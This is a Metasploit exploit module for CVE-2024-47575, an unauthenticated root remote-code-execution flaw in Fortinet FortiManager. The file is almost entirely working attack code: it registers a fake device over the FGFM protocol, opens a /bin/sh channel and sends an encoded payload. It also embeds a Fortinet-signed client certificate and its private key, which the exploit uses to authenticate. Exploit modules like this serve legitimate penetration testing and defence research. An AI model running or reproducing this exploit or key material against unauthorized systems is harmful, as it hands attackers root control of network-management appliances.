    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::Tcp  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Fortinet FortiManager Unauthenticated RCE',        'Description' => %q{          This module exploits a missing authentication vulnerability affecting FortiManager and FortiManager          Cloud devices to achieve unauthenticated RCE with root privileges.          The vulnerable FortiManager versions are:          * 7.6.0          * 7.4.0 through 7.4.4          * 7.2.0 through 7.2.7          * 7.0.0 through 7.0.12          * 6.4.0 through 6.4.14          * 6.2.0 through 6.2.12          The vulnerable FortiManager Cloud versions are:          * 7.4.1 through 7.4.4          * 7.2.1 through 7.2.7          * 7.0.1 through 7.0.12          * 6.4 (all versions).        },        'License' => MSF_LICENSE,        'Author' => [          'sfewer-r7', # MSF Exploit & Rapid7 Analysis        ],        'References' => [          ['CVE', '2024-47575'],          # AttackerKB Rapid7 Analysis.          ['URL', 'https://attackerkb.com/topics/OFBGprmpIE/cve-2024-47575/rapid7-analysis'],          # Bishop Fox details certificate requirements for connecting to the FGFM service.          ['URL', 'https://bishopfox.com/blog/a-look-at-fortijump-cve-2024-47575'],          # Vendor Advisory.          ['URL', 'https://fortiguard.fortinet.com/psirt/FG-IR-24-423']        ],        'DisclosureDate' => '2024-10-23',        'Platform' => %w[unix linux],        'Arch' => [ARCH_CMD],        'Privileged' => true, # Code execution as 'root'        'DefaultOptions' => {          'RPORT' => 541,          'SSL' => true,          'FETCH_WRITABLE_DIR' => '/tmp'        },        'Targets' => [ [ 'Default', {} ] ],        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options(      [        # The exploit provides a suitable client certificate/key pair by default, however we can let a user configure        # a different certificate/key pair to use if they want. The user can also override the serial number and        # platform if needed, but the exploit will try to detect the serial number and platform from the certificate        # by default.        OptPath.new('ClientCert', [false, 'A file path to an x509 cert, signed by Fortinet, with a serial number in the CN']),        OptPath.new('ClientKey', [false, 'A file path to the corresponding private key for the ClientCert.']),        OptString.new('ClientSerialNumber', [false, 'If set, use this serial number instead of extracting one from the ClientCert.']),        OptString.new('ClientPlatform', [false, 'If set, use this platform instead of determining the platform at runtime.'])      ]    )  end  def check    fgfm_sock = make_socket    peer_cert = OpenSSL::X509::Certificate.new(fgfm_sock.peer_cert)    fgfm_sock.close    organization = get_cert_subject_item(peer_cert, 'O')    common_name = get_cert_subject_item(peer_cert, 'CN')    # Detect that the target is a Fortinet FortiManager, by inspecting the certificate the server is using.    # We look for an organization (O) of 'Fortinet', and a common name (CN) that starts with a FortiManager serial    # number identifier.    return CheckCode::Detected('Detected Fortinet FortiManager') if organization == 'Fortinet' && common_name&.start_with?('FMG')    CheckCode::Unknown  end  def exploit    client_cert_raw = datastore['ClientCert'] ? File.binread(datastore['ClientCert']) : get_client_cert    client_cert = OpenSSL::X509::Certificate.new(client_cert_raw)    common_name = get_cert_subject_item(client_cert, 'CN')    fail_with(Failure::BadConfig, 'No common name in client certificate subject') unless common_name    print_status("Client certificate common name: #{common_name}")    serial_number = 'FMG-VM0000000000'    platform = 'FortiManager-VM64'    # The platform needs to be the expected type of the corresponding serial number. We try to match these up here,    # and we allow for the automatic detection to be overridden by the ClientSerialNumber and ClientPlatform options    # in case it is needed.    if common_name.start_with? 'FMG'      serial_number = common_name      platform = 'FortiManager-VM64'    elsif common_name.start_with? 'FG'      serial_number = common_name      platform = 'FortiGate-VM64'    else      print_warning('Client certificate does not include a serial number in the common name. The target must be configured to accept a certificate like this.')    end    serial_number = datastore['ClientSerialNumber'] if datastore['ClientSerialNumber']    platform = datastore['ClientPlatform'] if datastore['ClientPlatform']    print_status("Using client serial number '#{serial_number}' and platform '#{platform}'.")    print_status('Connecting...')    fgfm_sock = make_socket    fail_with(Failure::UnexpectedReply, 'Connection failed.') unless fgfm_sock    print_status('Registering device...')    req1 = "get auth\r\nserialno=#{serial_number}\r\nplatform=#{platform}\r\nhostname=localhost\r\n\r\n\x00"    resp1 = send_packet(fgfm_sock, req1)    unless resp1&.include?('reply 200')      fail_with(Failure::UnexpectedReply, 'Request 1 failed: No reply 200.')    end    print_status('Creating channel...')    req2 = "get connect_tcp\r\ntcp_port=rsh\r\nchan_window_sz=#{32 * 1024}\r\nterminal=1\r\ncmd=/bin/sh\r\nlocalid=0\r\n\r\n\x00"    resp2 = send_packet(fgfm_sock, req2)    unless resp2&.include?('action=ack')      fail_with(Failure::UnexpectedReply, 'Request 2 failed: No ack.')    end    localid = resp2.match(/localid=(\d+)/)    unless localid      fail_with(Failure::UnexpectedReply, 'Request 2 failed: No localid found.')    end    print_status('Triggering...')    req3 = "channel\r\nremoteid=#{localid[1]}\r\n\r\n\x00" + payload.encoded.length.to_s + "\n" + payload.encoded + "0\n"    send_packet(fgfm_sock, req3, read: false)  end  # We create a TCP socket like this as we want to control how we specify the client certificate/key pair, which may  # either be a file path, or a blob of text.  def make_socket    hash = {      'Proto' => 'tcp',      'PeerHost' => datastore['RHOST'],      'PeerPort' => datastore['RPORT'],      'SSL' => true,      'SSLVerifyMode' => 'NONE',      'Context' =>        {          'Msf' => framework,          'MsfExploit' => self        }    }    hash['SSLClientCert'] = datastore['ClientCert'] if datastore['ClientCert']    hash['SSLClientKey'] = datastore['ClientKey'] if datastore['ClientKey']    params = Rex::Socket::Parameters.from_hash(hash)    params.ssl_client_cert = get_client_cert unless datastore['ClientCert']    params.ssl_client_key = get_client_key unless datastore['ClientKey']    fgfm_sock = Rex::Socket::Tcp.create_param(params)    # Register our new socket, so that abort_sockets will close this socket after the payload handler    # has caught the session (or until WfSDelay timesout). This avoids us having to introduce a separate timeout    # in the exploit method, before we manually close the socket and then try to catch the session. We want to keep    # the socket open until we have a session, as closing the socket too quickly can prevent the payload command    # we transmit over the FGFM channel on this socket from executing.    add_socket(fgfm_sock)    fgfm_sock  end  def send_packet(fgfm_sock, data, read: true)    packet = [0x36E01100, data.length + 8].pack('NN')    packet += data    fgfm_sock.write(packet)    return nil unless read    header = fgfm_sock.read(8)    unless header      print_error('Failed to read an FGFM header')      return nil    end    magic, len = header.unpack('NN')    unless magic == 0x36E01100      print_error('Bad magic value in FGFM header')      return nil    end    unless len >= 8      print_error('Bad length value in FGFM header')      return nil    end    fgfm_sock.read(len - 8)  end  def get_cert_subject_item(cert, type)    cert.subject.to_a.each do |item|      return item[1] if item[0] == type    end    nil  end=beginAn x509 certificate from an unregistered FortiManager trial VM, located at /etc/cert/local/ on the device, with aserial number of FMG-VM0000000000 and a platform of FortiManager-VM64.$ sha1sum Fortinet_Local2.cer9fad50dace25e68694e028f628282b1194ec58a1  Fortinet_Local2.cer$ sha1sum Fortinet_Local2.keyd006e298df00450973e22c74726404d841db9874  Fortinet_Local2.key$ openssl x509 -noout -text -in Fortinet_Local2.cerCertificate:    Data:        Version: 3 (0x2)        Serial Number: 405822 (0x6313e)        Signature Algorithm: sha256WithRSAEncryption        Issuer: C = US, ST = California, L = Sunnyvale, O = Fortinet, OU = Certificate Authority, CN = support, emailAddress = support@fortinet.com        Validity            Not Before: Nov 10 21:14:26 2017 GMT            Not After : Jan 19 03:14:07 2038 GMT        Subject: C = US, ST = California, L = Sunnyvale, O = Fortinet, OU = FortiManager, CN = FMG-VM0000000000, emailAddress = support@fortinet.com=end  def get_client_cert    "-----BEGIN CERTIFICATE-----MIIDzDCCArSgAwIBAgIDBjE+MA0GCSqGSIb3DQEBCwUAMIGgMQswCQYDVQQGEwJVUzETMBEGA1UECBMKQ2FsaWZvcm5pYTESMBAGA1UEBxMJU3Vubnl2YWxlMREwDwYDVQQKEwhGb3J0aW5ldDEeMBwGA1UECxMVQ2VydGlmaWNhdGUgQXV0aG9yaXR5MRAwDgYDVQQDEwdzdXBwb3J0MSMwIQYJKoZIhvcNAQkBFhRzdXBwb3J0QGZvcnRpbmV0LmNvbTAeFw0xNzExMTAyMTE0MjZaFw0zODAxMTkwMzE0MDdaMIGgMQswCQYDVQQGEwJVUzETMBEGA1UECBMKQ2FsaWZvcm5pYTESMBAGA1UEBxMJU3Vubnl2YWxlMREwDwYDVQQKEwhGb3J0aW5ldDEVMBMGA1UECxMMRm9ydGlNYW5hZ2VyMRkwFwYDVQQDExBGTUctVk0wMDAwMDAwMDAwMSMwIQYJKoZIhvcNAQkBFhRzdXBwb3J0QGZvcnRpbmV0LmNvbTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMcgGzRlTTeVjIcE8D7z7Vnp6LKDcGE57VL4qs1fOxvTrK2j7vWbVMHSsOpf8taAAm55qmqeS//woCJQq3t5mmq1M6MHm2nom6Q+dObcsfhieLrIFwp9X1Xt9YHKQd5qOR5PysrMhFKdpwMJfmlzuWWcIUeilgecP6eq9GS50gu4m+0NK0d3LTsmWz1jLNC3k74fYwYDsaPnhl/tsxcqZWrYHUHJhH5ep8YAxE6Eo2JG67BXOI/JbxrWPEh+zRLqA7ZrWeBPl0AEIXTK+SIBJTW0dpnxEcG6wBQQxCp8jZ+RlaFpKjBdYucDVTDtkLabvetOrAn+mjcRutg6NHlptSECAwEAAaMNMAswCQYDVR0TBAIwADANBgkqhkiG9w0BAQsFAAOCAQEAl265IvoXNxpTJEWdYwYvjAFdaueBk349ApvriQmsPdAJmhFgF4U8l6PI/kBPVYCgzP0EA1zImHwLFkzlCVtMtzhuUY3h2ZIUEhYwX0xEf5Kay2XHicWAwugQ0k/QDmivw7/w7UTiwPaMLroEcjRbH8T4TLCXBdKsgXYW+t72CSA8MJDSug8o2yABom6XKlXl35mD93BrFkbxhhAiCrrC63byX7XTuXTyrP1dO9Qi9aSPWrIbi2SV+SjTLhP0n1bdikVOHNNreyhQRlRjguPrW0P2Xqjbecgp98tdRyoOSr9sF5Qo5TKdvIwUFClFgsy+7pactwTnQmwhvlLQ7Z/dOg==-----END CERTIFICATE-----"  end  def get_client_key    "-----BEGIN PRIVATE KEY-----MIIEvwIBADANBgkqhkiG9w0BAQEFAASCBKkwggSlAgEAAoIBAQDHIBs0ZU03lYyHBPA+8+1Z6eiyg3BhOe1S+KrNXzsb06yto+71m1TB0rDqX/LWgAJueapqnkv/8KAiUKt7eZpqtTOjB5tp6JukPnTm3LH4Yni6yBcKfV9V7fWBykHeajkeT8rKzIRSnacDCX5pc7llnCFHopYHnD+nqvRkudILuJvtDStHdy07Jls9YyzQt5O+H2MGA7Gj54Zf7bMXKmVq2B1ByYR+XqfGAMROhKNiRuuwVziPyW8a1jxIfs0S6gO2a1ngT5dABCF0yvkiASU1tHaZ8RHBusAUEMQqfI2fkZWhaSowXWLnA1Uw7ZC2m73rTqwJ/po3EbrYOjR5abUhAgMBAAECggEAcIXaGa+tBN4DfUDzKf/ZflfJ4SaZWLfNPne6vTc1RbJGABGFNVFDggu3YZo6ta+8sAUcogc11zl4pCuF286Jzgb7WQMxdZW2bgfFM7g+8adjpdjv/EOAniRL+b37nt3TzSc154fOtojUGclBoAF/IMYroDlmIoLPDcZzOIAxC+GUBCkCh/a3AFnhkkym0IGx4i89ji+nxcY5vEqD4n4Q49gkebxjmTVBq7YEU2YwOsbT0BO9jmYKE0wumetNpYJsR2qVI7dUmJMNdcEah/A9ODqMM2BJUxovW8XgR9wOIXN23aWwmPeAtTnVhvBaHJL/ItGOGjmdcM1pwChowCWj4QKBgQD5EMo2A9+qeziSt3VenmD1o7zDyGAe0bGLN4rIou6I/Zz8p7ckRYIAw2HhmsE2C2ZF8OS9GWmsu23tnTBlDQTj1fSquw1cjLxUgwTkLUF7FTUBrxLstYSz1EJSzd8+V8mLI3bXriq8yFVK7z8yjFBB3BqkqUcBjIWFAMDvWoyJtQKBgQDMq15o9bhWuR7rGTvzhDiZvDNemTHHdRWz6cxb4d4TWsRsK73Bv1VFRg/SpDTg88kV2X8wqt7yfR2qhcyiAAFJq9pflG/rUSp6KvNbcXW7ys+x33x+MkZtbSh8TJ3SP9IoppawB/SP/p2YxkdgjPF/sllPEAkgHznWGwk5jxRxPQKBgQDQAKGfcqS8b6PTg7tVhddbzZ67sv/zPRSVO5F/9fJYHdWZe0eL1zC3CnUYQHHTfLmw93lQI4UJaI5pvrjH65OF4w0t+IE0JaSyv6i6FsF01UUrXtbjMMTemgm5tY0XN6FtvfRmM2IlvvjcV+njgSMVnYfytBxEwuJPLU3zlx9/cQKBgQDB2GEPugLAqI6fDoRYjNdqy/Q/WYrrJXrLrtkuAQvreuFkrj0IHuZtOQFNeNbYZC0E871iY8PLGTMayaTZnnWZyBmIwzcJQhOgJ8PbzOc8WMdD6a6oe4d2ppdcutgTRP0QIU/BI5e/NeEfzFPYH0Wvs0Sg/EgYU1rc7ThceqZa5QKBgQCf18PRZcm7hVbjOn9iBFpFMaECkVcf6YotgQuUKf6uGgF+/UOEl6rQXKcf1hYcSALViB6M9p5vd65FHq4eoDzQRBEPL86xtNfQvbaIqKTalFDv4ht7DlF38BQx7MAlJQwuljj1hrQd9Ho+VFDuLh1BvSCTWFh0WIUxOrNlmlg1Uw==-----END PRIVATE KEY-----"  endend

Tag

#ssl